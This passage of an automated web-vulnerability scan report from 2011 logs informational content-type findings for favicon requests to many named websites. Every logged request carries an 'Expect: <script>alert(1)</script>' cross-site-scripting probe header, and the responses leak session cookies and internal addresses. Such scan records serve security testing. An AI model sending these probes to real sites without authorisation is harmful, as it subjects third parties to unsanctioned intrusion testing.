Date: Wed, 04 May 2011 01:24:23 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.240. http://www.wpr.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wpr.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wpr.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 02:30:47 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.241. http://www.writeaprisoner.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.writeaprisoner.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.writeaprisoner.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:31:04 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.242. http://www.xftvgirls.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xftvgirls.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xftvgirls.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:18:50 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.243. http://www.xignite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xignite.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xignite.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:28:07 GMT
Connection: close
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.244. http://www.yapchat.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.yapchat.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yapchat.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:44:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.245. http://www.zgallerie.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.zgallerie.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zgallerie.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:12:06 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.246. http://www.zumie.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.zumie.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zumie.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:08:28 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

32. Content type is not specified  previous
There are 39 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


32.1. http://www.actionallstars.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.actionallstars.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.actionallstars.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Accept-Ranges: bytes
ETag: W/"3291-1236821513000"
Last-Modified: Thu, 12 Mar 2009 01:31:53 GMT
Content-Length: 3291
Date: Wed, 04 May 2011 01:53:12 GMT
Connection: close

.PNG
.
...IHDR................a...    pHYs..X...X...m7...
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

32.2. http://www.allergan.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allergan.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allergan.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6535
X-Powered-By: ASP.NET
Exires: Tue, 19 Apr 2011 02:08:55 GMT
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2
Cache-Control: private, max-age=0
Date: Wed, 04 May 2011 02:10:32 GMT
Connection: close

404 NOT FOUND

32.3. http://www.amex.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amex.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amex.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:20:08 GMT
Server: Microsoft-IIS/6.0
Content-Length: 3638
Last-Modified: Tue, 07 Oct 2008 16:20:40 GMT
Accept-Ranges: bytes

..............h...&... ..............(....... ...........@............................q..u!........}..I(..kH......T...9...[...6...G...a...-...g ..I...aK..Q....|..A...1...Z
..;...>..b...U...7..}*...D
...[SNIP]...

32.4. http://www.analog.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.analog.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.analog.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 318
Last-Modified: Thu, 07 Apr 2011 16:05:36 GMT
X-Powered-By: Servlet/2.4 JSP/2.0
Date: Wed, 04 May 2011 01:55:16 GMT
Connection: close

..............(.......(....... .......................................???.fff..............................fff...............................-.........................B........i........}...........
...[SNIP]...

32.5. http://www.animalleague.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.animalleague.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.animalleague.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Xet-Cookie:
Age: 290
Date: Wed, 04 May 2011 00:39:03 GMT
Cache-Control: public
Connection: Keep-Alive
Via: NS-CACHE-6.0: 62
ETag: "Equ4cEFbFbH"
Server: Resin/3.1.8
Last-Modified: Thu, 26 Aug 2010 00:00:12 GMT
Content-Length: 607

GIF89a.......{{~~..l..n.....k.8..||..d..y.yy}.g.    i.$z....xx|.f....
k..b..c.......J..,...q........9..v...t.......    j....0..................e.............|y{......A...h....ww{............i..U.........
...[SNIP]...

32.6. http://www.autism-society.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autism-society.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.autism-society.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Xet-Cookie:
Age: 419
Date: Wed, 04 May 2011 01:48:22 GMT
Cache-Control: public
Connection: Keep-Alive
Via: NS-CACHE-6.0: 62
ETag: "F13VYLsNlAu"
Server: Resin/3.1.8
Last-Modified: Wed, 09 Mar 2011 02:45:35 GMT
Content-Length: 1406

..............h.......(....... ...............................fz........U.........................H)..................................):....9..d+.a...............if_.}l2..r^.......]...................
...[SNIP]...

32.7. http://www.bizsiteservice.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizsiteservice.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bizsiteservice.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 Ok
Date: Wed, 4-May-2011 04:36:53 GMT
Server: ezot/3
Connection: close
Set-Cookie: s=ACHKAPRQFGAJLJGJPJ;path=/;domain=.bizsiteservice.com; HttpOnly

<html>
<head>
<meta http-equiv="Refresh" CONTENT="0; URL=http://www.bizsiteservice.com/home/_"></head><body></body></html>

32.8. http://www.burntorangereport.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burntorangereport.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.burntorangereport.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 04 May 2011 00:58:21 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: JSESSIONID=638B9590D2FC48DD88F23A048F09F94D; Path=/
ETag: W/"963-1190009741000"
Last-Modified: Mon, 17 Sep 2007 06:15:41 GMT
Content-Length: 963

GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...

32.9. http://www.drgreene.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drgreene.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.drgreene.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
Retry-After: 0
Content-Length: 906
Date: Wed, 04 May 2011 01:09:27 GMT
X-Varnish: 486308707
Age: 0
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expect
...[SNIP]...

32.10. http://www.egyptair.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.egyptair.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.egyptair.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Date: Wed, 04 May 2011 01:00:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6335
X-Powered-By: ASP.NET
Exires: Tue, 19 Apr 2011 01:00:49 GMT
Cache-Control: private,max-age=0
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2
Set-Cookie: Commerce_TestPersistentCookie=TestCookie; expires=Thu, 05-May-2011 01:00:49 GMT; path=/
Set-Cookie: Commerce_TestSessionCookie=TestCookie; path=/
Set-Cookie: .ASPXANONYMOUS=LRfhi4hAzAEkAAAAY2ZkZTYwYjYtNDY0My00ODJkLWIyZTEtNGMwZjEzZTRkNGVi9OrfBE5WwOEiFcy6k_sgGDQKnnk1; expires=Tue, 12-Jul-2011 11:40:49 GMT; path=/; HttpOnly
Set-Cookie: presist=G8VTi1IGqTD8FCwSujhkeBs2tIdELH0ciJz7EiietcwXWULJjtZVFXg3UZnnPpJCD3fzF5VZwtnvIGg=; path=/

404 NOT FOUND

32.11. http://www.embark.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.embark.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.embark.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Date: Wed, 04 May 2011 03:31:06 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6315
X-Powered-By: ASP.NET
Exires: Tue, 19 Apr 2011 03:31:06 GMT
Cache-Control: private,max-age=0
Content-Length: 724
Public-Extension: http://schemas.microsoft.com/repl-2

<!-- _localBinding -->
<!-- _lcid="1033" _version="" -->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
   <meta HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />
   <meta HTTP-EQUIV="Expires" content="0" />
...[SNIP]...

32.12. http://www.evaphone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.evaphone.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.evaphone.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Wed, 04 May 2011 01:03:21 GMT
Connection: keep-alive
ETag: W/"1150-1303986094000"
Last-Modified: Thu, 28 Apr 2011 10:21:34 GMT
Content-Length: 1150

............ .h.......(....... ..... .............................................................O..    O..=O..yO...O...O..D................................O...O...P...P...O...O...O...O...L..I..........
...[SNIP]...

32.13. http://www.fluor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fluor.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fluor.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Cache-Control: private,max-age=0
Content-Length: 638
Server: Microsoft-IIS/7.0
Exires: Tue, 19 Apr 2011 01:57:13 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6421
Date: Wed, 04 May 2011 01:57:13 GMT

<!-- _localBinding -->
<!-- _lcid="1033" _version="" -->
<html>
<head>
   <meta HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />
   <meta HTTP-EQUIV="Expires" content="0" />
   <noscri
...[SNIP]...

32.14. http://www.gemvara.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gemvara.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gemvara.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=YKMIMIS192.168.100.34CKOKJ; path=/
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Expires: Mon, 02 May 2016 06:37:28 GMT
Last-Modified: Fri, 29 Apr 2011 20:29:00 GMT
Cache-Control: max-age=157700000;public;
Etag: W/"1150-1304108940000"
Accept-Ranges: bytes
Content-Language: en-US
Content-Length: 1150
Date: Wed, 04 May 2011 01:04:07 GMT

............ .h.......(....... ..... ........................................................................................................................~......p....~..............................
...[SNIP]...

32.15. http://www.greentreepayday.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greentreepayday.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greentreepayday.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
ETag: "9kDr3Z5tiX0"
Last-Modified: Wed, 07 Apr 2010 11:18:30 GMT
Accept-Ranges: bytes
Content-Length: 1406
Date: Wed, 04 May 2011 03:36:07 GMT
Set-Cookie: epersist=hTlrdfAsHlnlxiak0jcBLxoBfj8+Jx+dW360Wp64yDC6uDvQjcXz9FrdTqfp4TjS6ANcH1wa59kI; path=/

..............h.......(....... .....................................w.W>..................lL.......7.......:.q\8..qR...l.......r.....gQ*.W>..............kV0.....[C....s.......v......................z
...[SNIP]...

32.16. http://www.homeawayrealestate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homeawayrealestate.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homeawayrealestate.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
ETag: "4TuZXDYfKVa"
Last-Modified: Tue, 31 Aug 2010 15:52:10 GMT
Content-Length: 1150
Date: Wed, 04 May 2011 03:36:06 GMT
Set-Cookie: NSC_IBSF_Qfstjtufodf_Hspvq=ffffffffaf141c9b45525d5f4f58455e445a4a4229a0;path=/;httponly

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

32.17. http://www.homegauge.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homegauge.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homegauge.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Resin/3.0.26
P3P: CP="DSP ALL CUR OUR PUBi BUS NAV COM STA INT PHY DEM UNI ONL"
ETag: "E+Sq7GIZzr3"
Last-Modified: Wed, 31 Dec 2008 18:03:24 GMT
Accept-Ranges: bytes
Content-Length: 1406
Date: Wed, 04 May 2011 03:25:55 GMT

..............h.......(....... ...............................................@ .@........`..@@@.............................................p...H... ........x...p...d...\...T...L...H...4h...........
...[SNIP]...

32.18. http://www.hotelguide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelguide.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hotelguide.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=91C09431300AE28D2D381B824147CBC8; Path=/
ETag: W/"1150-1302690707000"
Last-Modified: Wed, 13 Apr 2011 10:31:47 GMT
Content-Length: 1150
Date: Wed, 04 May 2011 01:31:22 GMT
Server: JBoss 4.2

............ .h.......(....... ..... ....................................................q...`...M...6........................5...%..........................{...k...S...=...(................G...<.../
...[SNIP]...

32.19. http://www.hrs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hrs.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hrs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 27 Apr 2011 22:00:00 GMT
Content-Length: 3638
X-N: S
Date: Wed, 04 May 2011 03:31:56 GMT
Connection: close

...... ..........&...........h.......(... ...@...................................v...^F......J"..Vb..............fR..:....r...
......>B..>:......2...........bB..........fv..vb..Z6..&.......JR........
...[SNIP]...

32.20. http://www.iccsafe.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iccsafe.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.iccsafe.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Date: Wed, 04 May 2011 00:46:11 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6421
X-Powered-By: ASP.NET
Exires: Tue, 19 Apr 2011 00:46:11 GMT
Cache-Control: private,max-age=0
Content-Length: 753
Public-Extension: http://schemas.microsoft.com/repl-2
Set-Cookie: MSCSProfile=287001FD2674671C3E8AFF46EA22B2A247C55294F70F72F04A1F0A978A40E99997043B008192F604BB962037760358874502B454194CF2984B395D83F068E5E58A8A66BACE0E9CE6C013C861964522FAD40D000D51C28AF1EC2FA15DFB3074603CEB7BD4446E0915C35B17B2A66B8574FB83C087AB5A78D925FBD42AE90D6A23; path=/

<html>
<head>
   <meta HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />
   <meta HTTP-EQUIV="Expires" content="0" />
   <noscript>
       <meta http-equiv="refresh" content="0; url=/_layouts
...[SNIP]...

32.21. http://www.individualhealthquotes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.individualhealthquotes.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.individualhealthquotes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
Vary: Accept-Encoding
ETag: "/GpLFIMMe7t"
Last-Modified: Fri, 06 Nov 2009 22:32:04 GMT
Accept-Ranges: bytes
Cache-Control: max-age=5
Expires: Wed, 04 May 2011 00:59:08 GMT
Content-Length: 1150
Date: Wed, 04 May 2011 00:59:03 GMT

............ .h.......(....... ..... .......................................X.....................R*......................................W......................U-\..................................
...[SNIP]...

32.22. http://www.jaycfoods.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jaycfoods.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jaycfoods.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Node: Delta
Exires: Tue, 19 Apr 2011 02:45:58 GMT
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2
Cache-Control: private, max-age=0
Date: Wed, 04 May 2011 02:45:58 GMT
Connection: close

404 NOT FOUND

32.23. http://www.kaplan.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kaplan.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kaplan.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Date: Wed, 04 May 2011 02:23:12 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6219
X-Powered-By: ASP.NET
Exires: Tue, 19 Apr 2011 02:23:12 GMT
Cache-Control: private,max-age=0
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2

404 NOT FOUND

32.24. http://www.lakecountyil.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lakecountyil.gov
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lakecountyil.gov
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Date: Wed, 04 May 2011 00:52:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6318
Exires: Tue, 19 Apr 2011 00:52:09 GMT
Cache-Control: private,max-age=0
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2

404 NOT FOUND

32.25. http://www.newholland.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newholland.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newholland.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Connection: Keep-Alive
Set-Cookie: ISAWPLB{DB45DF86-F806-407C-932C-D52A60E4019E}={C6B36A65-A76A-4240-A401-E5A462A8468B}; HttpOnly; Path=/
Content-Length: 13
Date: Wed, 04 May 2011 02:31:27 GMT
Server: Microsoft-IIS/7.5
Cache-Control: private,max-age=0
Exires: Tue, 19 Apr 2011 02:31:28 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6553

404 NOT FOUND

32.26. http://www.oge.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oge.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oge.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Date: Wed, 04 May 2011 02:24:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Exires: Tue, 19 Apr 2011 02:24:01 GMT
Cache-Control: private,max-age=0
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2

404 NOT FOUND

32.27. http://www.ppg.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ppg.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
